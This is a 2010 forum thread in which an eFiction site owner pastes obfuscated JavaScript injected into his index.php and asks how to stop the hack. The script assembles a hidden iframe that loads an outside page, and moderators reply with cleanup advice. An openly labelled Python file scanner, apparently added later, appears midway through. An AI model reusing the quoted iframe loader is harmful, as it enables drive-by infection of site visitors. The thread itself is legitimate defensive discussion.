
XSS in index.php

10 Posts
4 Users
0 Reactions
1,971 Views
(@xtramalt)
Posts: 9
Active Member
Topic starter
 

Hi to all,

After an XSS attack by Russian hackers, I updated eFiction to the latest release, 3.5.2. Today I received a different attack, but again of the XSS type.
My index.php was modified, and in the $end PHP instruction, between ? and >, I found this code:

DO NOT OPEN ANY LINKS IN THIS CODE - THIS IS A VIRAL CODE


<html><body><script language='JavaScript'>function revr(inp) {var message1 = inp; var before = '';  var after = '';  var message2=''; for (count=message1.length; count >= 0; count--) message2+=message1.substring(count,count-1); var asd = document.write(before,message2,after); }var nn1 = 3120 + 652 / 5 * 6 - 526 - 3999 + 624 - 0.4 - .000000000000091; ;var fr = ">'nn1'=thgieh 'nn1'=htdiw '4=dis?php.og/ni.lilmucitfecanrof//:ptth'=crs emarfi<";function screenSize() {var w, h;w = (window.innerWidth ? window.innerWidth :(document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.offsetWidth)); h = (window.innerHeight ? window.innerHeight : (document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.offsetHeight)); return {w:w, h:h}; }var scr1 = screenSize().w;var scr2 = screenSize().h;if(scr1 > scr2) { revr(fr); } else {} </script></body></html>

So my $end instruction became ?{VIRAL_CODE}>
This of course causes a parse error, "unexpected ? on line X". After removing the viral code, how can I fix this definitively in order to defend eFiction from this type of XSS attack?
My eFiction is equipped with the Shoutbox... is it possible that the Shoutbox contains some unprotected $_POST input?


 
Posted : 16/09/2010 9:05 am
(@tammy)
Posts: 2577
Member Moderator
 

No.  They would have to have edited your files directly to insert between the ? and > in the index.php file.  You need to check ALL of your files and folders for files that shouldn't be there.  Pay close attention to your stories folder.  You also need to change your passwords both for e-fiction and your site's hosting account. 


 
Posted : 16/09/2010 10:14 am
(@xtramalt)
Posts: 9
Active Member
Topic starter
 

Sure?

I don't understand this choice of inserting the code in the $end tag... PHP is a pre-processor; when it finds the "?" it automatically stops the script execution. If a hacker wants to infect my users, he must insert the viral code in a part where it's executable.
So, you said to pay attention to the stories folder. That folder contains 3000+ subfolders, so I'm looking at writing a PHP script that automatically scans all the subfolders in the stories folder. Is it correct to say that those subfolders mustn't contain any .php, .js or .html files, but only .txt files and an images folder? Would it be helpful if I create a PHP script that automatically deletes all the files with these extensions?


 
Posted : 16/09/2010 3:51 pm
(@tammy)
Posts: 2577
Member Moderator
 

The stories folder is CHMOD'd to be accessible to anyone, so it's the most vulnerable to being hacked.  My guess is they weren't very good hackers or it was a bot adding the code.  It probably just looked for that last closing > not realizing it was a php file, not html.  And I would scan the folders by hand.  You can't write a script that would account for everything a hacker could have placed in that folder.  The images folder may have a single js related to an images list.


 
Posted : 17/09/2010 10:15 am
(@xtramalt)
Posts: 9
Active Member
Topic starter
 

I created and executed a PHP script that reveals:

- all the folder trees under /stories/, with a file listing;
- all the files with an extension other than ".txt";
- all the occurrences of <?php, <script type, or other strange tags in all .txt files;

... nothing! Nothing to delete; there are no illegal files in the entire /stories/ folder and its subfolders.

I changed the FTP server password and MySQL password.
I changed also all the passwords for administrative accounts. Now all passwords are >= 12 alphanumerical characters.

Tammy, do you have other tips?


 
Posted : 19/09/2010 4:32 pm
(@lyndsie)
Posts: 1263
Member Moderator
 

Have you checked any other index files? I once got hacked and Javascript was inserted in every index file in all the folders. Even within eFiction, a lot of the folders have blank index files for security, so I'd check those too.


 
Posted : 19/09/2010 5:11 pm
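A read-only sweep of the kind xtramalt describes, extended with Lyndsie's point about the placeholder index files, as an added example that is not code from this thread or from eFiction. It assumes the layout xtramalt states (story subfolders hold only .txt files plus an images folder) and that eFiction's placeholder index.php files are empty, so any content in one means something wrote to it. The marker list it greps for (<?php, <script, <iframe, eval(, base64_decode() goes beyond the two named in the post, and the sample tree it scans is constructed inline so the script runs offline. It reports rather than deletes, in line with Tammy's point that no script accounts for everything and the final review is done by hand.

```python
"""Read-only integrity sweep for an eFiction-style stories/ tree (added example)."""
import os
import re
import shutil
import tempfile

# Assumption from the thread: story folders hold only .txt files plus images.
# Anything else (including a .js in an images folder, which Tammy says may be
# legitimate) is reported for hand review, never removed.
ALLOWED_EXT = {".txt", ".jpg", ".jpeg", ".png", ".gif"}
# Markers that have no business inside a plain-text story or an empty index file.
SUSPICIOUS = re.compile(
    rb"<\?php|<\?=|<script|<iframe|base64_decode\s*\(|eval\s*\(", re.IGNORECASE)
INDEX_NAMES = {"index.php", "index.html", "index.htm"}


def first_marker(data):
    """Return 'marker @ line N' for the first suspicious marker in data, else None."""
    m = SUSPICIOUS.search(data)
    if not m:
        return None
    line = data.count(b"\n", 0, m.start()) + 1
    return f"{m.group().decode('ascii', 'replace')} @ line {line}"


def scan_tree(root):
    """Walk root and return sorted (kind, relative_path, detail) findings.

    kinds: bad-ext (extension not allowed), suspicious-content (marker in a .txt),
    nonempty-index (placeholder index file that is no longer 0 bytes).
    Nothing on disk is modified.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower() in INDEX_NAMES:
                with open(path, "rb") as fh:
                    data = fh.read()
                if data:
                    detail = first_marker(data) or f"{len(data)} bytes"
                    findings.append(("nonempty-index", rel, detail))
                continue
            ext = os.path.splitext(name)[1].lower()
            if ext not in ALLOWED_EXT:
                findings.append(("bad-ext", rel, ext or "(no extension)"))
                continue
            if ext == ".txt":
                with open(path, "rb") as fh:
                    hit = first_marker(fh.read())
                if hit:
                    findings.append(("suspicious-content", rel, hit))
    return sorted(findings)


def build_sample_tree(base):
    """Create a small constructed stories/ tree under base (sample data, not real files)."""
    root = os.path.join(base, "stories")
    layout = {
        "index.php": b"",                                  # untouched placeholder
        "101/index.php": b"",
        "101/1.txt": b"Chapter one. Nothing to see here.\n",
        "102/index.php": b"<html><body><script language='JavaScript'>x();</script></body></html>",
        "102/1.txt": b"Chapter one.\n<script src='http://example.invalid/x.js'></script>\n",
        "102/images/list.js": b"var images = [];",         # flagged for hand review
        "103/images/shell.php": b"<?php echo 'not a story'; ?>",
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


def demo():
    """Build the constructed tree in a temp dir, scan it, clean up, return findings."""
    base = tempfile.mkdtemp(prefix="efiction-scan-")
    try:
        return scan_tree(build_sample_tree(base))
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    import sys
    # Usage: python scan_stories.py /path/to/stories   (no argument: scan the sample tree)
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for kind, rel, detail in results:
        print(f"{kind:20} {rel:28} {detail}")
```

Run it against the real stories directory with the path as the only argument; the output is a list to review by hand, and a clean run prints nothing.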
(@tammy)
Posts: 2577
Member Moderator
 

You might also want to check with your hosting provider to make sure it wasn't a wider attack than just your files.


 
Posted : 19/09/2010 10:01 pm
(@xtramalt)
Posts: 9
Active Member
Topic starter
 

@Lyndsie

Yes, I checked all the index.php files and indeed they were infected. I replaced all the infected index.php files with the eFiction default (an empty index.php file, 0 bytes).

@Tammy

No, it wasn't an attack only on me. It was a massive attack. I experienced the same XSS attack on a website that I created recently. It was in a test phase, so I forgot to insert instructions like this:


// Sanitise every query-string value in place: strip_tags() and htmlentities()
// return the cleaned string, so the result has to be assigned back.
foreach ($_GET as $key => $value) {
    $_GET[$key] = htmlentities(strip_tags($value), ENT_QUOTES, 'UTF-8');
}

I always use HTML Purifier, a great PHP library that filters XSS in $_GET and $_POST. I suggest it to you for eFiction 4.0, because it also has a whitelist function (so you can, for example, extract all the permitted tags from a MySQL query on the eFiction tables).


 
Posted : 20/09/2010 8:35 pm
(@guest1448)
Posts: 0
 

@Xtramalt: In case you're using a Windows system, you should also check your local computer for any infections, not just your webhost. I was once infected with a virus which I was able to delete successfully, but the malware had enough time to collect usernames and passwords for my website. A week later *all* my sites were hacked with viral code. Fortunately I only had to re-upload the PHP files and not the whole MySQL database. Enough work nevertheless. 🙂

Steffen


 
Posted : 21/09/2010 6:17 am
(@tammy)
Posts: 2577
Member Moderator
 

If it was a massive attack, then I would guess it may not have been your files that were vulnerable.


 
Posted : 21/09/2010 6:16 pm